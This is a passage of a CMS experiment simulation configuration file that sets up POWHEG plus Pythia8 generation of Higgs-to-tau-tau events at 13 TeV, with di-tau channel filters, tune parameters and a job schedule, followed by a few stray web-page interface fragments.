            MuHadCut = cms.string('Mu.Pt > 19 && Had.Pt > 16 && Mu.Eta < 2.5 && Had.Eta < 2.6'),
            MuMuCut = cms.string('Mu1.Pt > 17 && Mu2.Pt > 8 && Mu1.Eta < 2.5 && Mu2.Eta < 2.5'),
            # All six di-tau decay channels are accepted.
            Final_States = cms.vstring(
                'ElEl',
                'ElHad',
                'ElMu',
                'HadHad',
                'MuHad',
                'MuMu'
            ),
            # PDG id of the boson whose decay is filtered (25 = Higgs).
            BosonPDGID = cms.int32(25)
        )
    ),
    PythiaParameters = cms.PSet(
        parameterSets = cms.vstring('pythia8CommonSettings',
            'pythia8CP5Settings',
            'pythia8PowhegEmissionVetoSettings',
            'processParameters'),
        # Force H -> tautau (15 -15) at m(H) = 125 GeV; POWHEG:nFinal = 1
        # is the number of Born-level final-state particles for the veto.
        processParameters = cms.vstring('POWHEG:nFinal = 1',
            '25:onMode = off',
            '25:onIfMatch = 15 -15',
            '25:m0 = 125.0'),
        # CP5 underlying-event tune parameters.
        pythia8CP5Settings = cms.vstring('Tune:pp 14',
            'Tune:ee 7',
            'MultipartonInteractions:ecmPow=0.03344',
            'PDF:pSet=20',
            'MultipartonInteractions:bProfile=2',
            'MultipartonInteractions:pT0Ref=1.41',
            'MultipartonInteractions:coreRadius=0.7634',
            'MultipartonInteractions:coreFraction=0.63',
            'ColourReconnection:range=5.176',
            'SigmaTotal:zeroAXB=off',
            'SpaceShower:alphaSorder=2',
            'SpaceShower:alphaSvalue=0.118',
            'SigmaProcess:alphaSvalue=0.118',
            'SigmaProcess:alphaSorder=2',
            'MultipartonInteractions:alphaSvalue=0.118',
            'MultipartonInteractions:alphaSorder=2',
            'TimeShower:alphaSorder=2',
            'TimeShower:alphaSvalue=0.118'),
        pythia8CommonSettings = cms.vstring('Tune:preferLHAPDF = 2',
            'Main:timesAllowErrors = 10000',
            'Check:epTolErr = 0.01',
            'Beams:setProductionScalesFromLHEF = off',
            'SLHA:keepSM = on',
            'SLHA:minMassSM = 1000.',
            'ParticleDecays:limitTau0 = on',
            'ParticleDecays:tau0Max = 10',
            'ParticleDecays:allowPhotonRadiation = on'),
        # Emission veto matching the POWHEG NLO emission with the shower.
        pythia8PowhegEmissionVetoSettings = cms.vstring('POWHEG:veto = 1',
            'POWHEG:pTdef = 1',
            'POWHEG:emitted = 0',
            'POWHEG:pTemt = 0',
            'POWHEG:pThard = 0',
            'POWHEG:vetoCount = 100',
            'SpaceShower:pTmaxMatch = 2',
            'TimeShower:pTmaxMatch = 2')
    ),
    comEnergy = cms.double(13000.0),
    filterEfficiency = cms.untracked.double(1.0),
    maxEventsToPrint = cms.untracked.int32(1),
    pythiaHepMCVerbosity = cms.untracked.bool(False),
    pythiaPylistVerbosity = cms.untracked.int32(1)
)
# ExternalLHEProducer: runs the POWHEG gg_H_quark-mass-effects gridpack
# (NNPDF3.1, m(H) = 125 GeV) from cvmfs to produce the input LHE events.
process.externalLHEProducer = cms.EDProducer("ExternalLHEProducer",
    args = cms.vstring('/cvmfs/cms.cern.ch/phys_generator/gridpacks/2017/13TeV/powheg/V2/gg_H_quark-mass-effects_NNPDF31_13TeV_M125/v1/gg_H_quark-mass-effects_NNPDF31_13TeV_M125_slc6_amd64_gcc630_CMSSW_9_3_0.tgz'),
    nEvents = cms.untracked.uint32(100),
    numberOfParameters = cms.uint32(1),
    outputFile = cms.string('cmsgrid_final.lhe'),
    scriptName = cms.FileInPath('GeneratorInterface/LHEInterface/data/run_generic_tarball_cvmfs.sh')
)
# Sequence prepended to the filtered paths below: generation + HepMC filter.
process.ProductionFilterSequence = cms.Sequence(process.generator)
# Path and EndPath definitions
process.lhe_step = cms.Path(process.externalLHEProducer)
process.generation_step = cms.Path(process.pgen)
process.simulation_step = cms.Path(process.psim)
process.genfiltersummary_step = cms.EndPath(process.genFilterSummary)
process.endjob_step = cms.EndPath(process.endOfProcess)
process.RAWSIMoutput_step = cms.EndPath(process.RAWSIMoutput)
process.LHEoutput_step = cms.EndPath(process.LHEoutput)
# Schedule definition
# NOTE: the LHEoutput EndPath is deliberately commented out of the
# schedule, so no separate LHE-tier file is written by this job.
process.schedule = cms.Schedule(process.lhe_step,process.generation_step,process.genfiltersummary_step,process.simulation_step,process.endjob_step,process.RAWSIMoutput_step)#,process.LHEoutput_step)
from PhysicsTools.PatAlgos.tools.helpers import associatePatAlgosToolsTask
associatePatAlgosToolsTask(process)
#Setup FWK for multithreaded
process.options.numberOfThreads=cms.untracked.uint32(4)
process.options.numberOfStreams=cms.untracked.uint32(0)
# filter all path with the production filter sequence
# (the LHE step must run unfiltered, hence the explicit skip below)
for path in process.paths:
	if path in ['lhe_step']: continue
	getattr(process,path)._seq = process.ProductionFilterSequence * getattr(process,path)._seq
# customisation of the process.
# Automatic addition of the customisation function from Configuration.DataProcessing.Utils
from Configuration.DataProcessing.Utils import addMonitoring
#call to customisation function addMonitoring imported from Configuration.DataProcessing.Utils
process = addMonitoring(process)
# End of customisation functions
# Customisation from command line
# Fixed per-job random seed for the LHE producer: 1542798870 % 100 == 70.
process.RandomNumberGeneratorService.externalLHEProducer.initialSeed=int(1542798870%100)
# Add early deletion of temporary data products to reduce peak memory need
from Configuration.StandardSequences.earlyDeleteSettings_cff import customiseEarlyDelete
process = customiseEarlyDelete(process)
# End adding early deletion
"[Email"
] | [Email |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.